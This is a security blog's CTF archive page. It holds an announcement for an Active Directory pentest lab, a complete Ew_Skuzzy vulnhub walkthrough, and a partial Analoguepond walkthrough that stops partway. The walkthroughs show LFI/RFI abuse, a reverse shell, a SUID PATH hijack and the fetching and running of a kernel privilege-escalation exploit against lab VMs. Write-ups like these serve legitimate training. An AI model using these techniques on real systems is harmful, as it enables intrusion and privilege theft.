Category Archives: ctf

Offshore – A Windows Active Directory Pentesting Lab

Intro

In August ch4p from Hack the Box approached me with an offer to build a CTF for the annual Greek capture the flag event called Panoptis. The idea was to build a unique Active Directory lab environment to challenge CTF competitors by exposing them to a simulated real-world penetration test (pretty rare for a CTF). I spent a bit over a month building the first iteration of the lab and thus Offshore was born.

I flew to Athens, Greece for a week to provide on-site support during the lab. Overall the CTF lab was a hit and very well received by the competitors and others involved with the event.

Afterwards, ch4p offered for me to further build out the lab and eventually offer it as a Pro Lab on the main Hack the Box website. I spent another 3 or so months refining elements within the lab, increasing the overall size and difficulty and causing ch4p a lot of stress by asking for more and more storage, ram and virtual networks.

I spent countless hours with the goal of building a realistic Active Directory based lab that had the feel of a real-world corporate environment made up of many things I have seen during internal/external penetration testing engagements over the years.  My goal was to produce a lab that would be accessible and achievable by junior penetration testers, help mid-level folks improve their skills and even provide a bit of a challenge to seasoned veterans. The lab also serves as a test bed to try out many common and obscure AD attacks that you may read about but either never encounter during a real-world engagement or do not have the proper testing environment to practice and refine the techniques.

The lab went live on September 1, 2018 and has been a hit so far. Of course there were a few issues I had to hammer out after go-live and some lessons learned but overall it has been a success.  This project has been an exciting and humbling experience. I learned a ton while building this and configuring many of the attacks. So far feedback has been positive.

Anyways, lets get into a description of the lab.

Description

You are an agent tasked with exposing money laundering operations in an offshore international bank. Breach the DMZ and pivot through the internal network to locate the bank’s protected databases and a shocking list of international clients. OFFSHORE is designed to simulate a real-world penetration test, starting from an external position on the internet and gaining a foothold inside a simulated corporate Windows Active Directory network. Users will have to pivot and jump across trust boundaries to complete the lab. This lab is intended to expose participants to:

  • Web application attacks
  • Enumeration
  • Exploitation of common and obscure real-world Active Directory flaws
  • Local privilege escalation
  • Lateral movement and crossing trust boundaries
  • Evading endpoint protections
  • Reverse engineering
  • Out-of-the-box thinking

Players will have the opportunity to attack 16 hosts of various operating system types and versions to obtain 29 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. The Active Directory lab simulates the look and feel of a real-world corporate network complete with very active simulated users and other elements of a busy enterprise. The lab is designed to start out relatively easy and progress in difficulty throughout.

Users will start from an external perspective and have to penetrate the “DMZ” and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab.

Target Audience

I designed Offshore to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned testers as well as infosec hobbyists and even blue teamers, there is something for everyone. I can pretty much guarantee you will pick up at least a few new tricks which can be immediately applied to your real-world engagements or take back to your organization to  help improve the overall security posture.

Pricing

Please reach out for pricing. Tickets are available for 30, 60, or 90 days of access for individuals. Corporate pricing is also available for larger groups.

Additional Information

Offshore is hosted in conjunction with Hack the Box  (https://www.hackthebox.eu). Participants will receive a VPN key to connect directly to the lab.

Once connected to VPN, the entry point for the lab is 10.10.110.0/24.  *Note* The firewall at 10.10.110.3 is out of scope.

If you have questions or would like to learn more about the lab, feel free to contact me on Twitter or on Mattermost. Participants in the lab will have access to a private Offshore channel on the  Netsecfocus  Mattermost (https://chat.netsecfocus.com/join).

Ew_Skuzzy:1 vulnhub walkthrough

It’s been a while since I’ve had the time to take on a VM over at vulnhub or put together a walkthrough. Building my own challenges, studying for the OSCE, work, and family took all of my time.

I finally had some free time so I checked out the latest slew of releases. Ew_Skuzzy had been up for a few days without any walkthroughs so it looked like a good challenge.

You can grab the VM here: https://www.vulnhub.com/entry/ew_skuzzy-1,184/

The readme has a note that VMware users may have issues. If you use VMware workstation like I do (or player) these steps will get you up and running.

I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

        1) sudo su
	2) mount /dev/sda1 /mnt
	3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
	4) Vim /mnt/etc/default/grub and edit the line 
	GRUB_CMDLINE_LINUX="" to read: 
	GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
	5) Poweroff
	6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
	7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
	8) In this shell type "update-grub" then type "exit"
	9) Select "execute a shell in the installer environment", then "poweroff"
       10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

Once that was done I fired up the VM,  and got to work. The creator was nice enough to post the IP for us:

I started off with an nmap scan of all ports which showed SSH, nginx on port 80 and an ISCSI service listening on port 3260.

root@kali:~# nmap -sV -p- -T4 192.168.85.146 

Starting Nmap 6.46 ( http://nmap.org ) at 2017-03-21 13:09 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.85.146
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     (protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=3/21%Time=58D15E6E%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4ubuntu2\.1\r\n");
MAC Address: 00:0C:29:C8:3D:31 (VMware)

I ran dirb for a bit and came up with several trolls:

The page source of the above page had a base64 encoded comment in the HTML:

Sadly not our first flag:

root@kali:~# echo SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlvdXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZlciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRlbGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do

And I want to tell you so much, no flags for you...

This was my first time dealing with an ISCSI service so I found this link very helpful: https://www.pentestpartners.com/blog/an-interesting-route-to-domain-admin-iscsi/

My first step was to download and install open-iscsi. I was using an older Kali1 VM for this so it was easier to just manually grab and install the .deb from here: https://packages.debian.org/jessie/i386/open-iscsi/download

root@kali:~# dpkg -i open-iscsi_2.0.873+git0.3b4b4500-8+deb8u2_i386.deb

I next ran some discovery with iscsiadm:

root@kali:~# iscsiadm -m discovery -t st -p 192.168.85.146:3260
192.168.85.146:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

Next I used iscsiadm to connect to the target:

root@kali:~# iscsiadm -m node -p 192.168.85.146 --login --target iqn.2017-02.local.skuzzy:storage.sys0
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] successful.

fdisk showed me that I now had an additional drive (/dev/sbdb):

root@kali:~# fdisk -l

Disk /dev/sda: 21.5 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders, total 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000d28c9

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048    40136703    20067328   83  Linux
/dev/sda2        40138750    41940991      901121    5  Extended
/dev/sda5        40138752    41940991      901120   82  Linux swap / Solaris

Disk /dev/sdb: 1073 MB, 1073741824 bytes
34 heads, 61 sectors/track, 1011 cylinders, total 2097152 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000

Disk /dev/sdb doesn't contain a valid partition table

I next mounted the file system and found the first flag along with a floppy disk image:

root@kali:~# mount /dev/sdb /mnt/skuzzy/
root@kali:~# cd /mnt/skuzzy/
root@kali:/mnt/skuzzy# ls
bobsdisk.dsk  flag1.txt  lost+found
root@kali:/mnt/skuzzy# cat flag1.txt 
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

The floppy can be mounted with the following commands:

root@kali:/mnt/skuzzy# losetup /dev/loop0 /mnt/skuzzy/bobsdisk.dsk 

root@kali:/mnt# mkdir /mnt/floppy
root@kali:/mnt# mount /dev/loop0 -o loop /mnt/floppy
root@kali:/mnt# ls
floppy  hgfs  skuzzy
root@kali:/mnt# cd floppy/
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv.enc  ToAlice.eml

An email to Alice gave me flag # 2 as well as several clues for how to decrypt the encrypted .csv file:

root@kali:/mnt/floppy# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) 🙂

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

What stuck out was the following:

  • Competition in October 2000 (AES);
  • 256 bit;
  • “those blocks chain together”  (cipher block chaining);
  • The Spanish swear word was likely a key “supercalifragilisticoespialidoso”;
  • An allusion to rockyou (possibly rockyou.txt for brute forcing the passphrase); and
  • Command option -md sha256 (these are openssl command line options).

The intent may have been to brute force the passphrase but it seemed like it had already been given to us, so after a bit of trial and error I was able to decrypt the .csv with the following command, feeding it the passphrase above:

root@kali:/mnt/floppy# openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md SHA256
enter aes-256-cbc decryption password:
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv  ToAlice.csv.enc  ToAlice.eml

The .csv gave me flag #3 as well as some new web directories to target:

The first was a troll with some retro Geocities scrolling marquee, nice touch:

The page source again contained a base64 encoded comment which was another troll:

root@kali:~# cat base64.txt | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 

Soup Nazi: NO FLAG FOR YOU

The second URL was a sweet custom web app:

The ‘Feed Reader’ page was of particular interest and at first glance looked as though it could be leveraged for either an LFI or RFI, or both!

Browsing to http://192.168.85.146/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt gave me the following:

Browsing directly to the data.txt file gave me the full contents which would be useful later:

I checked the troll image exif data for any clues but there was nothing to be had.

I next turned my attention to the ‘p’ parameter to see if I could get something going. Using the technique discussed in this post https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ I was able to leverage an LFI to pull out the base64 encoded source of each of the PHP pages. I also ran this to try to read files such as /etc/passwd but there were some blocks in place.

Index.php

Flag.php gave me the 4th flag as well as a clue that this flag would come in handy at some point:

The contents of reader.php was particularly interesting:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
	    $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck 🙂 But.. You have the source anyway, right? 🙂 
	    if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
	    }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) { 
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}

A check was being made to make sure that the file being server was from the localhost otherwise a key value was needed. The key value had to be the sha256 of a 47 character string and passed as a parameter with the GET request. Hm, flag 4 is exactly 47 characters. The sha256 of flag 4 checked out perfectly against the $secret variable in the source:

root@kali:/var/www# echo -n flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} | sha256sum
5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656 

The PHP would next check the data.txt ##text## section and print it to the screen and evaluate whatever PHP code was in the ##php## section. A quick check showed me that I had command execution.

 

There are several ways to get a shell but this is what I tried after trying to obtain a reverse shell with mknod, netcat and other methods did not work. This could have been split into one command as well instead of two.

I created a tiny shell script with the following PHP command and hosted it on my local Apache server:

I then executed the following two commands to upload the shell script to /tmp and execute it:

Wonderful, a shell!

root@kali:/var/www# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.85.131] from (UNKNOWN) [192.168.85.146] 51562
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ ls
ls
data.txt  index.php   party.php   trollface.png
flag.php  parrot.gif  reader.php  welcome.php

The usual enumeration turned up an interesting SUID binary in /opt.

www-data@skuzzy:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup

Just running the binary it appeared to execute the ID command before attempting to make an SSH connection:

On a hunch that ID command was not being called with an absolute path I created a dummy file /tmp/id with the contents “/bin/sh” and modified my path variable. By doing this, if successful, when running the alicebackup binary from the /opt directory while in the /tmp directory I should be able to have the program call my malicious ID shell script due to the path abuse.

I ran the command, fixed up my path variable and it worked. I now had root access and the 5th and final flag:

This was a great VM and an interesting twist with the ISCSI angle as well as the combined LFI/RFI. Unique and kept me on my toes. Setting up open-iscsi to interact with the service was not difficult and worth the learning opportunity.

Thanks to @vortexau for putting together challenge, can’t wait to see the next one!

As always thank you to @g0tmi1k for hosting these challenges and maintaining Vulnhub.

 

Analoguepond Vulnhub Walkthrough

Just around the time I was learning/experimenting with Puppet in my home lab knightmare   asked me to preview a new VM based around some real-world  tactics. This was a truly unique and interesting challenge and shows the dangers of leaving a Puppet, Ansible or any other configuration management or package management tool unsecured. As always the VM was ripe with cultural references which kept me on my toes researching both the nuances and the technical pieces. I highly recommend taking it for a spin, you can grab it here: https://www.vulnhub.com/entry/analougepond-1,185/

The README provides some hints for getting going:

Since you're not a Teuchter, I'll offer some hints to you:

Remember TCP is not the only protocol on the Internet My challenges are never finished with root. I make you work for the flags. The intended route is NOT to use forensics or 0-days, I will not complain either way.

To consider this VM complete, you need to have obtained:

    Troll Flag: where you normally look for them
    Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am.
    Flag 2: It will include a final challenge to confirm you hit the jackpot.
    Have root everywhere (this will make sense once you're in the VM)
    User passwords
    2 VNC passwords

Best of luck! If you get stuck, eat some EXTRABACON

NB: Please allow 5-10 minutes or so from powering on the VM for background tasks to run before proceeding to attack.

After loading it up and waiting a few minutes I had an IP and was ready to go:

I added an entry to my hosts file to simplify things and  started out with an nmap scan of all TCP ports and also a UDP scan of top 1000 ports due to the readme alluding to other protocols in use.

The TCP scan just gave me an SSH port, I didn’t even attempt bruteforcing because I knew knightmare wouldn’t make it that easy.

root@mrb3n:~# nmap -sV -Pn -T4 -p- --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 09:39 EST
Stats: 0:10:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 39.70% done; ETC: 10:05 (0:15:34 remaining)
Nmap scan report for 192.168.85.128
Host is up (0.0010s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:C9:A7:A4 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The UDP scan turned up SNMP and based on the readme nod towards EXTRABACON (which requires SSH, SNMP and a public SNMP community string) I directed by attention here with snmpwalk.

root@mrb3n:~# nmap -sU --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 06:07 EST
Nmap scan report for 192.168.85.128
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 00:0C:29:C9:A7:A4 (VMware)

I’ve truncated the output and just left in the key items

root@mrb3n:~# snmpwalk analoguepond -c public -v1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analougepond 3.19.0-77-generic #85~14.04.1-Ubuntu SMP Mon Dec 5 11:19:02 UTC 2016 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (103731) 0:17:17.31
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analougepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (16) 0:00:00.16

So based on this it seems pretty certain that ‘eric’ is our username. I would have tried combos such as eric.burdon, eburdon etc but ‘eric@example.com’ seemed to be nudging me in the right direction. Our hint “There is a house in New Orleans…” could only the “the Rising Sun”. Which makes sense because Eric Burdon was the lead vocalist for the band: https://en.wikipedia.org/wiki/The_Animals.

Cranking this up in my headphones as the wife and kid slept I was able to SSH in with the creds eric:therisingsun.

Once in I was dropped into Eric’s home directory and had a couple of images as well as a binary named ‘spin’ which appeared to do just that, throw up a spinning cursor. Not useful…yet. I pulled down the images with SCP and checked for anything tasty in the exif data but came up empty, for now.

eric@analougepond:~$ pwd
/home/eric
eric@analougepond:~$ ls
reticulatingsplines.gif  

root@mrb3n:~# scp eric@analoguepond:/home/eric/reticulatingsplines.gif /var/www/html/
eric@analoguepond's password: 
reticulatingsplines.gif                                                                                                100%   29KB   2.4MB/s   00:00   

hmm, no clue at this point but I’ll hang onto it, it may prove to be useful.

The readme mentioned VNC passwords, a netstat showed that VNC was present on the localhost on 5900 and 5901. Ifconfig showed a virtual bridge on the 192.168.122.0/24 subnet so we must be dealing with some libvirt emulation here. The readme also mentions multiple hosts, I am guessing 2 additional ones :).

eric@analougepond:~$ netstat -antp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0    408 192.168.85.128:22       192.168.85.129:55386    ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN
eric@analougepond:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:c9:a7:a4  
          inet addr:192.168.85.128  Bcast:192.168.85.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fec9:a7a4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6766 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5594 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:452860 (452.8 KB)  TX bytes:521927 (521.9 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:71 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6140 (6.1 KB)  TX bytes:6140 (6.1 KB)

virbr0    Link encap:Ethernet  HWaddr 52:54:00:b2:23:25  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:440 errors:0 dropped:0 overruns:0 frame:0
          TX packets:218 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24024 (24.0 KB)  TX bytes:17414 (17.4 KB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:6d:93:6a  
          inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:424 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1698 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:202700 (202.7 KB)  TX bytes:243315 (243.3 KB)

vnet1     Link encap:Ethernet  HWaddr fe:54:00:5b:05:f7  
          inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:707 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1919 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:194781 (194.7 KB)  TX bytes:285088 (285.0 KB)

Pulling up virsh and listing out the virtual hosts confirmed what we are dealing with.

virsh # list
 Id    Name                           State
----------------------------------------------------
 2     barringsbank                   running
 3     puppet                         running

Looking around the file system I really didn’t find much at first. Digging deeper I believe I found the locations of the VNC passwords  but could not read them until I was root, will come back to that later.

Doing a uname -a showed that the kernel was likely vulnerable to the overlayfs root exploit:

eric@analoguepond:/var/lib/libvirt/network$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Several options come up in exploit-db

root@kali2-CTP:/var/www/html# searchsploit overlayfs
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                        |  Path
                                                                                                                      | (/usr/share/exploitdb/platforms)
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
OverlayFS inode Security Checks - 'inode.c' Local Security Bypass                                                     | /linux/local/36571.sh
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation                        | /linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)   | /linux/local/37293.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)                                        | /linux/local/39166.c
Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)                                                             | /linux/local/39230.c
Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)                               | /linux/local/40688.rb

Let’s go with 39166.c because this one has worked for me a few times in the past.  We pull the file over to the target and compile it.

eric@analoguepond:/tmp$ wget http://192.168.110.145/39166.c
--2017-06-26 17:16:53--  http://192.168.110.145/39166.c
Connecting to 192.168.110.145:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2681 (2.6K) [text/x-csrc]
Saving to: ‘39166.c’

100%[===============================================================================================================>] 2,681       --.-K/s   in 0s      

2017-06-26 17:16:53 (47.6 MB/s) - ‘39166.c’ saved [2681/2681]

eric@analoguepond:/tmp$ gcc 39166.c -o dobber
eric@analoguepond:/tmp$ chmod +x dobber 
eric@analoguepond:/tmp$ ./dobber

Running it and we’ve got out root shell and of course our first troll flag.

root@analoguepond:/tmp# cd /root
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

Taking a look at the libvirsh default.xml networking file gives us IPs and hostnames for our other hosts.

root@analoguepond:/var/lib/libvirt/network# ls
default.xml
root@analoguepond:/var/lib/libvirt/network# cat default.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh net-edit default
or other application using the libvirt API.
-->

<networkstatus>
  <class_id bitmap='0-2'/>
  <floor sum='0'/>
  <network>
    <name>default</name>
    <uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid>
    <forward mode='nat'>
      <nat>
        <port start='1024' end='65535'/>
      </nat>
    </forward>
    <bridge name='virbr0' stp='on' delay='0'/>
    <mac address='52:54:00:b2:23:25'/>
    <ip address='192.168.122.1' netmask='255.255.255.0'>
      <dhcp>
        <range start='192.168.122.10' end='192.168.122.15'/>
        <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
        <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
      </dhcp>
    </ip>
  </network>

We can also find live  hosts with a little bash one-liner:

root@analoguepond:/var/lib/libvirt/network# for ip in 192.168.122.{1..254}; do ping -c 1 $ip > /dev/null && echo "${ip} is up"; done
192.168.122.1 is up
192.168.122.2 is up
192.168.122.3 is up

Next we need the qemu config files to grab the VNC passwords:

find / -name "*.xml"
...snip...

/etc/libvirt/qemu/barringsbank.xml
/etc/libvirt/qemu/puppet.xml


root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit barringsbank
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>barringsbank</name>
  <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
